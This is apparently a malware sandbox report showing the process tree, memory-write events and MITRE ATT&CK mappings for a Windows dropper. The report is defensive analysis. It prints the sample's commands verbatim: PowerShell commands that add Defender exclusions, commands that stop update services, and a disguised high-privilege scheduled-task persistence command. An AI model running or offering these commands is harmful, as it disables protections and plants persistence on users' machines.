PID 3872 wrote to memory of 4408	3872	23441.exe	115
PID 3872 wrote to memory of 4408	3872	23441.exe	115
PID 3872 wrote to memory of 4408	3872	23441.exe	115
PID 4408 wrote to memory of 5060	4408	sysblvrvcr.exe	116
PID 4408 wrote to memory of 5060	4408	sysblvrvcr.exe	116
PID 4408 wrote to memory of 5060	4408	sysblvrvcr.exe	116
PID 4408 wrote to memory of 1312	4408	sysblvrvcr.exe	118
PID 4408 wrote to memory of 1312	4408	sysblvrvcr.exe	118
PID 4408 wrote to memory of 1312	4408	sysblvrvcr.exe	118
PID 5060 wrote to memory of 3468	5060	cmd.exe	120
PID 5060 wrote to memory of 3468	5060	cmd.exe	120
PID 5060 wrote to memory of 3468	5060	cmd.exe	120
PID 1312 wrote to memory of 536	1312	cmd.exe	121
PID 1312 wrote to memory of 536	1312	cmd.exe	121
PID 1312 wrote to memory of 536	1312	cmd.exe	121
PID 1312 wrote to memory of 4632	1312	cmd.exe	122
PID 1312 wrote to memory of 4632	1312	cmd.exe	122
PID 1312 wrote to memory of 4632	1312	cmd.exe	122
PID 1312 wrote to memory of 4772	1312	cmd.exe	123
PID 1312 wrote to memory of 4772	1312	cmd.exe	123
PID 1312 wrote to memory of 4772	1312	cmd.exe	123
PID 1312 wrote to memory of 2496	1312	cmd.exe	124
PID 1312 wrote to memory of 2496	1312	cmd.exe	124
PID 1312 wrote to memory of 2496	1312	cmd.exe	124
PID 1312 wrote to memory of 1968	1312	cmd.exe	125
PID 1312 wrote to memory of 1968	1312	cmd.exe	125
PID 1312 wrote to memory of 1968	1312	cmd.exe	125
PID 4252 wrote to memory of 2968	4252	sysddnr.exe	129
PID 4252 wrote to memory of 2968	4252	sysddnr.exe	129
PID 4252 wrote to memory of 2968	4252	sysddnr.exe	129
PID 4408 wrote to memory of 8	4408	sysblvrvcr.exe	130
PID 4408 wrote to memory of 8	4408	sysblvrvcr.exe	130
PID 8 wrote to memory of 2632	8	198133041.exe	131
PID 8 wrote to memory of 2632	8	198133041.exe	131
PID 8 wrote to memory of 2504	8	198133041.exe	133
PID 8 wrote to memory of 2504	8	198133041.exe	133
PID 2632 wrote to memory of 1100	2632	cmd.exe	135
PID 2632 wrote to memory of 1100	2632	cmd.exe	135
PID 2504 wrote to memory of 2496	2504	cmd.exe	136
PID 2504 wrote to memory of 2496	2504	cmd.exe	136
PID 4252 wrote to memory of 2656	4252	sysddnr.exe	137
PID 4252 wrote to memory of 2656	4252	sysddnr.exe	137
PID 4252 wrote to memory of 2656	4252	sysddnr.exe	137
PID 4408 wrote to memory of 1064	4408	sysblvrvcr.exe	138
PID 4408 wrote to memory of 1064	4408	sysblvrvcr.exe	138
PID 4408 wrote to memory of 1064	4408	sysblvrvcr.exe	138
PID 4408 wrote to memory of 2464	4408	sysblvrvcr.exe	139
PID 4408 wrote to memory of 2464	4408	sysblvrvcr.exe	139
PID 4408 wrote to memory of 2464	4408	sysblvrvcr.exe	139
PID 2464 wrote to memory of 3404	2464	1915218797.exe	140
PID 2464 wrote to memory of 3404	2464	1915218797.exe	140
PID 4408 wrote to memory of 5048	4408	sysblvrvcr.exe	141
PID 4408 wrote to memory of 5048	4408	sysblvrvcr.exe	141
PID 4408 wrote to memory of 5048	4408	sysblvrvcr.exe	141
PID 4240 wrote to memory of 4800	4240	winupsecvmgr.exe	152
PID 4240 wrote to memory of 1776	4240	winupsecvmgr.exe	153
PID 4408 wrote to memory of 1744	4408	sysblvrvcr.exe	156
PID 4408 wrote to memory of 1744	4408	sysblvrvcr.exe	156

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3372
- C:\Users\Admin\AppData\Local\Temp\980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
  "C:\Users\Admin\AppData\Local\Temp\980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe"
  2⤵
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\37949668\sysddnr.exe
    C:\Windows\37949668\sysddnr.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\23441.exe
      C:\Users\Admin\AppData\Local\Temp\23441.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3872
    - - C:\Windows\sysblvrvcr.exe
        
        C:\Windows\sysblvrvcr.exe
        5⤵
        Modifies security service
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4408
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1312
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:536
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4632
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4772
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2496
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\198133041.exe
        
        C:\Users\Admin\AppData\Local\Temp\198133041.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:8
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2632
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:1100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2504
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:2496
      - C:\Users\Admin\AppData\Local\Temp\2090427174.exe
        
        C:\Users\Admin\AppData\Local\Temp\2090427174.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\1915218797.exe
        
        C:\Users\Admin\AppData\Local\Temp\1915218797.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\3892412225.exe
        
        C:\Users\Admin\AppData\Local\Temp\3892412225.exe
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3404
      - C:\Users\Admin\AppData\Local\Temp\2285710112.exe
        
        C:\Users\Admin\AppData\Local\Temp\2285710112.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5048
      - C:\Users\Admin\AppData\Local\Temp\1892230035.exe
        
        C:\Users\Admin\AppData\Local\Temp\1892230035.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1744
        
        C:\Windows\sysppvrdnvs.exe
        
        C:\Windows\sysppvrdnvs.exe
        7⤵
        Modifies security service
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        System Location Discovery: System Language Discovery
        
        PID:4556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1100
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4032
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3552
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1364
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:672
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        9⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\2876132126.exe
        
        C:\Users\Admin\AppData\Local\Temp\2876132126.exe
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3104
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:4608
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        10⤵
        
        PID:4688
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:2400
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        10⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\783223494.exe
        
        C:\Users\Admin\AppData\Local\Temp\783223494.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\608015116.exe
        
        C:\Users\Admin\AppData\Local\Temp\608015116.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\153056533.exe
        
        C:\Users\Admin\AppData\Local\Temp\153056533.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\12514.exe
      C:\Users\Admin\AppData\Local\Temp\12514.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2968
  - - C:\Users\Admin\AppData\Local\Temp\21276.exe
      C:\Users\Admin\AppData\Local\Temp\21276.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\12174.exe
      C:\Users\Admin\AppData\Local\Temp\12174.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:3540
    - - C:\Users\Admin\sysblvrvcr.exe
        
        C:\Users\Admin\sysblvrvcr.exe
        5⤵
        Modifies security service
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        System Location Discovery: System Language Discovery
        Suspicious behavior: SetClipboardViewer
        
        PID:3236
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3404
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:508
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2464
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4108
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1436
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2156
      - C:\Users\Admin\AppData\Local\Temp\252852848.exe
        
        C:\Users\Admin\AppData\Local\Temp\252852848.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:544
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:1152
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:2612
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:1600
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:4568
      - C:\Users\Admin\AppData\Local\Temp\2899026932.exe
        
        C:\Users\Admin\AppData\Local\Temp\2899026932.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1844
      - C:\Users\Admin\AppData\Local\Temp\3275818656.exe
        
        C:\Users\Admin\AppData\Local\Temp\3275818656.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4528
      - C:\Users\Admin\AppData\Local\Temp\36959972.exe
        
        C:\Users\Admin\AppData\Local\Temp\36959972.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3716
  - - C:\Users\Admin\AppData\Local\Temp\24716.exe
      C:\Users\Admin\AppData\Local\Temp\24716.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2744
  - - C:\Users\Admin\AppData\Local\Temp\33749.exe
      C:\Users\Admin\AppData\Local\Temp\33749.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4808
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2552
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4800
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:1776

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry